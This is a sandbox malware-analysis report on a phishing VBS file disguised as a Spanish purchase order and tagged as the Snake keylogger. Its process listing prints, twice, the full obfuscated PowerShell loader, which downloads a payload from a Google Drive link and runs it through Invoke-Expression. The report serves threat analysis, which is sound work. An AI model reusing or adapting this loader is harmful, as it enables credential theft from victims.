File name:

CONSTRUCTORA OBRAS PÚBLICAS SAN EMETERIO S.A ARTÍCULOS EN ORDEN DE COMPRA LISTA ADJUNTA.vbs

Full analysis: https://app.any.run/tasks/593bd2f0-76a4-4bff-9244-be7456a130cf
Verdict: Malicious activity
Threats:

A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools.

Malware Trends Tracker     >>>
Analysis date: October 30, 2024, 10:55:32
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
evasion
snake
keylogger
telegram
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

375D1F996700A161DD834355BE96AF7D

SHA1:

A0ECD96D8F4964204C1FA2FE27E7ACE733721735

SHA256:

7716A52936C2096E3C7E6E1A0157D297322EC72EE6E974C7446C3147480A0B69

SSDEEP:

6144:En64ik47Q3WAFLOgL6hPnAIjxnH7sjS3xcrl0ZIRN2XrwozRMeqzAv+qmXpiEcI5:ZgcgL8jD/wGmzcspqgOwY0

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Base64-obfuscated command line is found

      • wscript.exe (PID: 6692)

    • Accesses WMI object, sets custom ImpersonationLevel (SCRIPT)

      • wscript.exe (PID: 6692)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 6692)

  • INFO

    • Manual execution by a user

      • powershell.exe (PID: 6044)

    • The process uses the downloaded file

      • wscript.exe (PID: 6692)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
137
Monitored processes
8
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe conhost.exe no specs powershell.exe no specs conhost.exe no specs sppextcomobj.exe no specs slui.exe no specs msiexec.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1168"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exeSppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
1576\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5220"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Destilleringers Aadselbillens Optrkkene Chammy Insightfully Spadserede Reinterrogated #>;$Treaarsdages='Raylessness62';<#Kainsi Extendible Prestigiation #>; function Lerholdighedens($Rkeenglerne){If ($host.DebuggerEnabled) {$Supercandidness++;}$Kvikslvets=$Uger+$Rkeenglerne.'Length'-$Supercandidness; for ( $Plowback=5;$Plowback -lt $Kvikslvets;$Plowback+=6){$Atomsprngningernes=$Plowback;$Notationsform+=$Rkeenglerne[$Plowback];$Basidiospore='Blousily';}$Notationsform;}function Degeneroos($Battet){ . ($Vagttjeneste) ($Battet);}$Desolate=Lerholdighedens 'BatikM TyraoSnavszNonp i Ex aldestalNitroa Haan/A,ver ';$Rdehavssejladser=Lerholdighedens 'Un onTCemenlantips Dik 1 ordr2Rekap ';$Elektrolyt36='Exhor[Sn ppnCom.eEModert M.di.Cypris PseueDestirPartivL labiMultiC mpasEVadefPTironODommeIDashiNDownrTbrabrMSteg.A Yu,lN oungAUndergS ltmeSpunsrColto] Docu:,lank:PseudsPinlieOvatoCAlbiruEn anrCordii ya stR arwyLeve,pBenefrChri,oOverstSq.arOUc erCCognoO unrilFirew=assiz$SubmiRKapped Skvae prithSelvea MorsVM.liesTransSTmr reMamaljBjergL LuxeaIn erdbrneps KompeSummeRS mme ';$Desolate+=Lerholdighedens 'Virks5Cart .luci.0Tyran Agla(Sc,igW hopiHalvtnBrummdGodowo KonewOverpsBanan ArbitNStbniTPrepl Bryde1 Rhe.0Kelse.Kimon0Nonch;Rok.e FladeW Ba liHeartnPolyn6stamf4Dyreh;Tedes SyncxIndlu6.nued4Hoved;Styrt MerkarFemrevSemap:Aften1Taare3Takke1Udmel.Svmm 0Ajiva)Mekan GymnaG rifteUni.fcTelesk veroVrdif/maler2Ferma0Ndtvu1Junc 0Kamer0 .luf1She p0Grif 1Inte, A tomF driei .nverFor ge TjrefKvilioFormax Rein/Lrred1vidne3Domin1Barse.Fu le0A.geb ';$Lucifer=Lerholdighedens 'Ba seuP,eems InelEAfnotRC whe-BreadAMoon gTama e Unhen f.buT S dd ';$Deactivate=Lerholdighedens 'unwash V sttbar.etb.ostpHarr,sRi.ks:Dyreb/ Fase/Akvard eforrMakroiConcav AdsceFog d.Skralg irloHipbuochylog aurl pseue D cl.TelfocFl ckohepa mTraad/Hedg.uZ phic hori?AflokeSuprax R gspUpl,fo aktfrForhatSh ma=Irre,dParamoTe eawSkr inTremplBetaloSvegeaSamand Tart&Fle.siIndkrdoxidi=Under1MaquigTubbeQ wilk6Negat4HieraS Fosf- LataqAndenJTe ef4Retar-InferQLandsi Skufquns p0FrsteITriko7polypeSting_Lass jAromaxUdsprOS.even ,oveDA.pluw No.flHov d4Ci ke5a tinuTwe v5Sympa9Usm dfFa sabForsi ';$Unrecoded=Lerholdighedens 'Pause>Pneum ';$Vagttjeneste=Lerholdighedens ' SpheIOveraeLngsexA.hvl ';$Dyrkere='Coiffures';$Ligges235='\romtoddyens.Sde';Degeneroos (Lerholdighedens 'Skriv$ Pat gUnderLPetroO BrinbKraftANonatl eret:Bl ckpLovo.lEgo,eAS.ittt PalaEAuspiAMaliu7Be,ar3Skalp=impri$RisikESyntrnScal VCykel:PetheAFarenpKortaPpa orDfdeafA kaalt Kns A Capa+ Unma$GrundlRe koIS ndbGBugtagFl,tfEBrevssDorse2S opf3Kapa,5Per.p ');Degeneroos (Lerholdighedens 'Iller$ Sy bgNo,coLTinneOOrdstBIndsnaUntroLTab d:CabbafAsyljlAnbraOSarinT Leg aIn igT,nrovi Ox.toEnedeNSubcrsKumis=Isobo$NoserDUlyk eoveraAYounecAma,iTFem,riH lskvDet.raCar,etTracheDebar.inscasBon.hPProgrlAfregIRabbiTSk.lo( airm$W.ichUKe son HavaRFortre Y.erCUnsupOIndtaDSammeEHaantdTings) Prea ');Degeneroos (Lerholdighedens $Elektrolyt36);$Deactivate=$Flotations[0];$microsomatous=(Lerholdighedens 'unpai$SoddegRibblL,eashOEnevaBP euda AnstLApok.:Disi.cembryuDaintdPlai D B anY,atun6 Auto0Elbil= Un,pNSheepEMedieWGa,ss-LkkesoGalejbCi cuJ luetETruthCSacc tB len ExfigsTu.tayDissesUan eTUndise BrndmLydi .EnmotnUnhooEB staTMacro.MurkiWMaaneeSulphbGanglChypsiL,abelicasteE immuNgalopTYa er ');Degeneroos ($microsomatous);Degeneroos (Lerholdighedens 'Infil$YamanCChewiu PunkdSyne d CarvyWegen6 jems0slack.IntegH Sonne IngeaApplidOprejeSlutsrAfte.sSuper[ rogr$GemmaLRef.auWearic SideiReallfPolyseFragmrbevae]Honor=Monoi$AutomDtr aseK,rtesPdag.o Unrel PrydaFyrtatAlmaneMatam ');$Untheatrically=Lerholdighedens 'f rsv$ Fi zCOrtopuSimild ResidEro.iyBul a6Fo,an0Bagma. BiorD agskoalcalw Kvutn S thlFusioo DattaArb.sdTrijuFkr meiArbejlAm ereDecon( Stat$RecopDSagfreBifala UdkocbellitFre uiTendevkalm.asparttop rieZoocu, Boon$ TastRGoldheSecond UnunoNegridsirenoC,lcai Funen ZoangKv li)Trans ';$Redodoing=$Platea73;Degeneroos (Lerholdighedens 'Leafw$ KvasGN tvilAnmieoAllegbCoadjA CotyLGalap:Apothk .ulbABeediNantilnTaksteProtevSottiAkomfosT.agtE FissrBeton=Sygep( Solst Hy rESidseSGenn tStivf- Tystp omniaMahont ammeHProfe Bayad$ B,hvr U taeBambuDherkiocarb.dAzureoKobolI Emb,NChimaGTital) Stil ');while (!$Kannevaser) {Degeneroos (Lerholdighedens ' Pseu$EspongGlamol verroBombib rejea Mousl ludg: AntoACharakPeractKlyv i uvago SteenAntidsMiljvaSanserFighttFauldeMistnrD agr= dema$vgtedt DairrTransuYannieKilim ') ;Degeneroos $Untheatrically;Degeneroos (Lerholdighedens 'Bajons VagaTEner AAttilrA dabT Pib -EtherS anklL HejsE ampeTritipBille Co,si4Hemo ');Degeneroos (Lerholdighedens 'Sta u$ uxeGCte,iLCursooAraneb Breiac metLCaran:Finkuk SphaaPreponParchNT ansEGraphVWaageaBlindsDampsE A.hiRKimis=Turk (UdplaTStungeSnoolS Nonatkrepl-UnproPPrejuAStreet KlumHaktiv Dyds,$JipijrStirpesovemDR asaoAcknodFactuOAu usIWomannKidn g Snor)klkes ') ;Degeneroos (Lerholdighedens ' olys$ sar,GPyj mlCarano PrinbI.dloa DefelFletd:circuLNecroY Vresmpa,abP SemiHSoa iOLarciePawmodRrligE EmanmEfterASweat=Omsp $Budgeg.eddel TopkoSa orBDyrekaSk,evlN the:GdninfGav eOsknherTertiyDe erNTrykfGSkavgeInforL BestS F ekE VaabS ntigK .nfouSkinlrPelobe f ldn SkndS gods+Tur u+No.fa%Miss.$ emmef BlaklBumseO FolktBl.ndaVolaiTB,dniIHawokOSlowmn ubnuSTouri. D slC BotooAdderU svr n BumptZonel ') ;$Deactivate=$Flotations[$Lymphoedema];}$Calluses=291313;$Wranny=32061;Degeneroos (Lerholdighedens ' Tran$StoppG hestl Nonto efilbCauloAGenfol Imit:Strabs BrosTJemezU Dk inSulpht P rpEMor.ld Tvi Unexp=Re,se Premg anareTunnetPrein- adiCoprikOReprsn artnT,pidoemarxiN UninTd.sod Uvede$Ov.rnr SmldeTrigodIncunoEn arDDu,lxoSommeiOps.eNNavelG Unen ');Degeneroos (Lerholdighedens 'Rgsk,$ Lnd gMortelGushioEhta bTerniaPreaul In.i:AbelmPQuintrStilkeBankkd KatoeSpiratAcipeaLattiiKulisnCount Hyper=Br,pl Unil[StrawSKonkuyTrv es RelitPa tee LnnomAflur. Pox.C InexoS awenJewe vTilf e Ci crGearvtSu.fl]Vokse:xerop: DiamFRy rarHypnooEm edm ForpB udlaaA orts JackeManag6Indma4SkaldSF.rgat prykrDr.ssiRadion.alongMor i(Baand$RecurSOverctSk bsuCountnOverft S rueRemi.dnbbed)Intor ');Degeneroos (Lerholdighedens ' Addl$Di,xigMjaveLEsse.oInd eb,nfanAUncatL Rock:TawieSPlanlt DesurTa.geaMultinTele GDukk,uOveroL Su.eaFdevatSkovliPapmeOLiljeNValutS Cosm Bevog=Unus. Ideli[Kirk SN whaY rotosD dupT E ide Enedm Toxi. UnfrtVisa eL stiX ivsmT Skrm.Forfle rotonCl iscNitrooCanelD AloeiSumpsnSv.nggBille]Chlor: Taks:.resaA.eknoS VrisCKickiI kspeITe,ti. hromg Re,eeSkrivt Hea,SHovedtYdernR reoliKopimNUnre gAks,l(re um$HyperP TranRSikkeEHymnid BiocEReev T StikAFingeI Na,rN Bal,)frott ');Degeneroos (Lerholdighedens 'slhun$UdsulGLiterLTinnioEvocaBIntima Ban LAnnso:CoupsTTepida M.rrF rnaFgaranEFyr nlIndigbIma iJPektieL cetR InvogPartie SendSAstro= Lazu$ ,enhSIsostT OutfrOverwaUp.icNAndelGSublaUOparblTap lASkanntFerruifrdseOProteN.ectoSTek,t.BossaSenevou Enh BE sposunbartBivirRspejdi inibN Ce,hgforre(Forsk$AugusCprevaaJul kLKalkvlDe rouSmircsKn breBod sSRekor,Hypni$ etroW PapiRcapmaaFakeyn ,mbenhov,dYMaski) Rkeh ');Degeneroos $Taffelbjerges;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5952\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6044"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Destilleringers Aadselbillens Optrkkene Chammy Insightfully Spadserede Reinterrogated #>;$Treaarsdages='Raylessness62';<#Kainsi Extendible Prestigiation #>; function Lerholdighedens($Rkeenglerne){If ($host.DebuggerEnabled) {$Supercandidness++;}$Kvikslvets=$Uger+$Rkeenglerne.'Length'-$Supercandidness; for ( $Plowback=5;$Plowback -lt $Kvikslvets;$Plowback+=6){$Atomsprngningernes=$Plowback;$Notationsform+=$Rkeenglerne[$Plowback];$Basidiospore='Blousily';}$Notationsform;}function Degeneroos($Battet){ . ($Vagttjeneste) ($Battet);}$Desolate=Lerholdighedens 'BatikM TyraoSnavszNonp i Ex aldestalNitroa Haan/A,ver ';$Rdehavssejladser=Lerholdighedens 'Un onTCemenlantips Dik 1 ordr2Rekap ';$Elektrolyt36='Exhor[Sn ppnCom.eEModert M.di.Cypris PseueDestirPartivL labiMultiC mpasEVadefPTironODommeIDashiNDownrTbrabrMSteg.A Yu,lN oungAUndergS ltmeSpunsrColto] Docu:,lank:PseudsPinlieOvatoCAlbiruEn anrCordii ya stR arwyLeve,pBenefrChri,oOverstSq.arOUc erCCognoO unrilFirew=assiz$SubmiRKapped Skvae prithSelvea MorsVM.liesTransSTmr reMamaljBjergL LuxeaIn erdbrneps KompeSummeRS mme ';$Desolate+=Lerholdighedens 'Virks5Cart .luci.0Tyran Agla(Sc,igW hopiHalvtnBrummdGodowo KonewOverpsBanan ArbitNStbniTPrepl Bryde1 Rhe.0Kelse.Kimon0Nonch;Rok.e FladeW Ba liHeartnPolyn6stamf4Dyreh;Tedes SyncxIndlu6.nued4Hoved;Styrt MerkarFemrevSemap:Aften1Taare3Takke1Udmel.Svmm 0Ajiva)Mekan GymnaG rifteUni.fcTelesk veroVrdif/maler2Ferma0Ndtvu1Junc 0Kamer0 .luf1She p0Grif 1Inte, A tomF driei .nverFor ge TjrefKvilioFormax Rein/Lrred1vidne3Domin1Barse.Fu le0A.geb ';$Lucifer=Lerholdighedens 'Ba seuP,eems InelEAfnotRC whe-BreadAMoon gTama e Unhen f.buT S dd ';$Deactivate=Lerholdighedens 'unwash V sttbar.etb.ostpHarr,sRi.ks:Dyreb/ Fase/Akvard eforrMakroiConcav AdsceFog d.Skralg irloHipbuochylog aurl pseue D cl.TelfocFl ckohepa mTraad/Hedg.uZ phic hori?AflokeSuprax R gspUpl,fo aktfrForhatSh ma=Irre,dParamoTe eawSkr inTremplBetaloSvegeaSamand Tart&Fle.siIndkrdoxidi=Under1MaquigTubbeQ wilk6Negat4HieraS Fosf- LataqAndenJTe ef4Retar-InferQLandsi Skufquns p0FrsteITriko7polypeSting_Lass jAromaxUdsprOS.even ,oveDA.pluw No.flHov d4Ci ke5a tinuTwe v5Sympa9Usm dfFa sabForsi ';$Unrecoded=Lerholdighedens 'Pause>Pneum ';$Vagttjeneste=Lerholdighedens ' SpheIOveraeLngsexA.hvl ';$Dyrkere='Coiffures';$Ligges235='\romtoddyens.Sde';Degeneroos (Lerholdighedens 'Skriv$ Pat gUnderLPetroO BrinbKraftANonatl eret:Bl ckpLovo.lEgo,eAS.ittt PalaEAuspiAMaliu7Be,ar3Skalp=impri$RisikESyntrnScal VCykel:PetheAFarenpKortaPpa orDfdeafA kaalt Kns A Capa+ Unma$GrundlRe koIS ndbGBugtagFl,tfEBrevssDorse2S opf3Kapa,5Per.p ');Degeneroos (Lerholdighedens 'Iller$ Sy bgNo,coLTinneOOrdstBIndsnaUntroLTab d:CabbafAsyljlAnbraOSarinT Leg aIn igT,nrovi Ox.toEnedeNSubcrsKumis=Isobo$NoserDUlyk eoveraAYounecAma,iTFem,riH lskvDet.raCar,etTracheDebar.inscasBon.hPProgrlAfregIRabbiTSk.lo( airm$W.ichUKe son HavaRFortre Y.erCUnsupOIndtaDSammeEHaantdTings) Prea ');Degeneroos (Lerholdighedens $Elektrolyt36);$Deactivate=$Flotations[0];$microsomatous=(Lerholdighedens 'unpai$SoddegRibblL,eashOEnevaBP euda AnstLApok.:Disi.cembryuDaintdPlai D B anY,atun6 Auto0Elbil= Un,pNSheepEMedieWGa,ss-LkkesoGalejbCi cuJ luetETruthCSacc tB len ExfigsTu.tayDissesUan eTUndise BrndmLydi .EnmotnUnhooEB staTMacro.MurkiWMaaneeSulphbGanglChypsiL,abelicasteE immuNgalopTYa er ');Degeneroos ($microsomatous);Degeneroos (Lerholdighedens 'Infil$YamanCChewiu PunkdSyne d CarvyWegen6 jems0slack.IntegH Sonne IngeaApplidOprejeSlutsrAfte.sSuper[ rogr$GemmaLRef.auWearic SideiReallfPolyseFragmrbevae]Honor=Monoi$AutomDtr aseK,rtesPdag.o Unrel PrydaFyrtatAlmaneMatam ');$Untheatrically=Lerholdighedens 'f rsv$ Fi zCOrtopuSimild ResidEro.iyBul a6Fo,an0Bagma. BiorD agskoalcalw Kvutn S thlFusioo DattaArb.sdTrijuFkr meiArbejlAm ereDecon( Stat$RecopDSagfreBifala UdkocbellitFre uiTendevkalm.asparttop rieZoocu, Boon$ TastRGoldheSecond UnunoNegridsirenoC,lcai Funen ZoangKv li)Trans ';$Redodoing=$Platea73;Degeneroos (Lerholdighedens 'Leafw$ KvasGN tvilAnmieoAllegbCoadjA CotyLGalap:Apothk .ulbABeediNantilnTaksteProtevSottiAkomfosT.agtE FissrBeton=Sygep( Solst Hy rESidseSGenn tStivf- Tystp omniaMahont ammeHProfe Bayad$ B,hvr U taeBambuDherkiocarb.dAzureoKobolI Emb,NChimaGTital) Stil ');while (!$Kannevaser) {Degeneroos (Lerholdighedens ' Pseu$EspongGlamol verroBombib rejea Mousl ludg: AntoACharakPeractKlyv i uvago SteenAntidsMiljvaSanserFighttFauldeMistnrD agr= dema$vgtedt DairrTransuYannieKilim ') ;Degeneroos $Untheatrically;Degeneroos (Lerholdighedens 'Bajons VagaTEner AAttilrA dabT Pib -EtherS anklL HejsE ampeTritipBille Co,si4Hemo ');Degeneroos (Lerholdighedens 'Sta u$ uxeGCte,iLCursooAraneb Breiac metLCaran:Finkuk SphaaPreponParchNT ansEGraphVWaageaBlindsDampsE A.hiRKimis=Turk (UdplaTStungeSnoolS Nonatkrepl-UnproPPrejuAStreet KlumHaktiv Dyds,$JipijrStirpesovemDR asaoAcknodFactuOAu usIWomannKidn g Snor)klkes ') ;Degeneroos (Lerholdighedens ' olys$ sar,GPyj mlCarano PrinbI.dloa DefelFletd:circuLNecroY Vresmpa,abP SemiHSoa iOLarciePawmodRrligE EmanmEfterASweat=Omsp $Budgeg.eddel TopkoSa orBDyrekaSk,evlN the:GdninfGav eOsknherTertiyDe erNTrykfGSkavgeInforL BestS F ekE VaabS ntigK .nfouSkinlrPelobe f ldn SkndS gods+Tur u+No.fa%Miss.$ emmef BlaklBumseO FolktBl.ndaVolaiTB,dniIHawokOSlowmn ubnuSTouri. D slC BotooAdderU svr n BumptZonel ') ;$Deactivate=$Flotations[$Lymphoedema];}$Calluses=291313;$Wranny=32061;Degeneroos (Lerholdighedens ' Tran$StoppG hestl Nonto efilbCauloAGenfol Imit:Strabs BrosTJemezU Dk inSulpht P rpEMor.ld Tvi Unexp=Re,se Premg anareTunnetPrein- adiCoprikOReprsn artnT,pidoemarxiN UninTd.sod Uvede$Ov.rnr SmldeTrigodIncunoEn arDDu,lxoSommeiOps.eNNavelG Unen ');Degeneroos (Lerholdighedens 'Rgsk,$ Lnd gMortelGushioEhta bTerniaPreaul In.i:AbelmPQuintrStilkeBankkd KatoeSpiratAcipeaLattiiKulisnCount Hyper=Br,pl Unil[StrawSKonkuyTrv es RelitPa tee LnnomAflur. Pox.C InexoS awenJewe vTilf e Ci crGearvtSu.fl]Vokse:xerop: DiamFRy rarHypnooEm edm ForpB udlaaA orts JackeManag6Indma4SkaldSF.rgat prykrDr.ssiRadion.alongMor i(Baand$RecurSOverctSk bsuCountnOverft S rueRemi.dnbbed)Intor ');Degeneroos (Lerholdighedens ' Addl$Di,xigMjaveLEsse.oInd eb,nfanAUncatL Rock:TawieSPlanlt DesurTa.geaMultinTele GDukk,uOveroL Su.eaFdevatSkovliPapmeOLiljeNValutS Cosm Bevog=Unus. Ideli[Kirk SN whaY rotosD dupT E ide Enedm Toxi. UnfrtVisa eL stiX ivsmT Skrm.Forfle rotonCl iscNitrooCanelD AloeiSumpsnSv.nggBille]Chlor: Taks:.resaA.eknoS VrisCKickiI kspeITe,ti. hromg Re,eeSkrivt Hea,SHovedtYdernR reoliKopimNUnre gAks,l(re um$HyperP TranRSikkeEHymnid BiocEReev T StikAFingeI Na,rN Bal,)frott ');Degeneroos (Lerholdighedens 'slhun$UdsulGLiterLTinnioEvocaBIntima Ban LAnnso:CoupsTTepida M.rrF rnaFgaranEFyr nlIndigbIma iJPektieL cetR InvogPartie SendSAstro= Lazu$ ,enhSIsostT OutfrOverwaUp.icNAndelGSublaUOparblTap lASkanntFerruifrdseOProteN.ectoSTek,t.BossaSenevou Enh BE sposunbartBivirRspejdi inibN Ce,hgforre(Forsk$AugusCprevaaJul kLKalkvlDe rouSmircsKn breBod sSRekor,Hypni$ etroW PapiRcapmaaFakeyn ,mbenhov,dYMaski) Rkeh ');Degeneroos $Taffelbjerges;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
6248C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
6504"C:\WINDOWS\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.19041.3636 (WinBuild.160101.0800)
6692"C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\CONSTRUCTORA OBRAS PÚBLICAS SAN EMETERIO S.A ARTÍCULOS EN ORDEN DE COMPRA LISTA ADJUNTA.vbs"C:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
10 567
Read events
10 567
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
9
Text files
5
Unknown types
0

Dropped files

PID
Process
Filename
Type
6044powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2umk2yhe.kvt.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5220powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:2B561B5E78E4067B167039075E57DCC2
SHA256:7775AE8C83A7A2DA7CEFF9683D52313D85C7B78E30544CFEE5512BDE926684C7
6504msiexec.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199binary
MD5:E935BC5762068CAF3E24A2683B1B8A88
SHA256:A8ACCFCFEB51BD73DF23B91F4D89FF1A9EB7438EF5B12E8AFDA1A6FF1769E89D
5220powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_r4ywpliz.lnp.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6504msiexec.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EAbinary
MD5:846E55A191AEFBDA65C3F410957BD74C
SHA256:749A131EE0A0A1762F8630BC3AE0E9BC58D3475B3E3975A8CA05B6CACF592AFD
6504msiexec.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199binary
MD5:E32F6262A6E9E771AC71D0A0DB5152EC
SHA256:B4293FB2DAA9BC3AEE08B996E8C34C89F5CD6217A08C5410DCA45EEDA59F278C
5220powershell.exeC:\Users\admin\AppData\Roaming\romtoddyens.Sdetext
MD5:24B5B005BD540BF757D1F62B761D27CC
SHA256:23787D329359824098BA0737C98988A666C77222B4E53F843538318C4BFE5585
6504msiexec.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7binary
MD5:711ED3CDDFA780D4011763AA882D6BB1
SHA256:EC3A28A8AB7323BFD0E1F2D05FB393280A44B0AE63C98AE763AC032A7375F86A
6044powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ita0ag1e.acp.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5220powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_s5kfhpjy.oa2.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
21
TCP/UDP connections
58
DNS requests
27
Threats
19

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
23.48.23.156:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1880
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
2444
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
